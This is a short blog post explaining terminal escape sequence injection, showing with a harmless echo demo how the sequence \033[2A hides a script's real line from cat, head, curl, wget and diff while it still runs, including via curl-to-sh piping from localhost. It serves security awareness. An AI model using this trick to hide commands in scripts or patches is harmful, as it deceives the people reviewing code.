A photo of Mitesh Shah

Mitesh Shah

Linux Expert | Automation Enthusiast | Security Consultant

Email Skype Github Twitter Resume Hire Me Keybase LinkedIn Stackoverflow


How it technically works

  • A terminal escape sequence is a special sequence of characters that is printed (like any other text).
  • If the terminal understands the sequence, it won’t display the character-sequence, but will perform some action.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh

$ chmod +x backdoor.sh

$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!

$ ./backdoor.sh
doing something evil!
  • As you can see, our beloved ‘cat’ cheated on us.
  • Instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action.
  • And this action moves the cursor up X times, overwriting what is above it X lines.
  • But this doesn’t affect only cat, it affects everything that interprets escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!

$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!

$ more backdoor.sh
#!/bin/bash
echo doing something very nice!

$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
  • But if we pipe it into a shell
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!

$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
  • diff also interprets escape sequences and so do the resulting patches
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!

$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
+++ legit.sh	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
  #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!

Reference

http://www.openwall.com/lists/oss-security/2015/09/17/5 http://www.openwall.com/lists/oss-security/2015/08/11/8 http://turbochaos.blogspot.ca/2014/08/journalctl-terminal-escape-injection.html





Post Navigation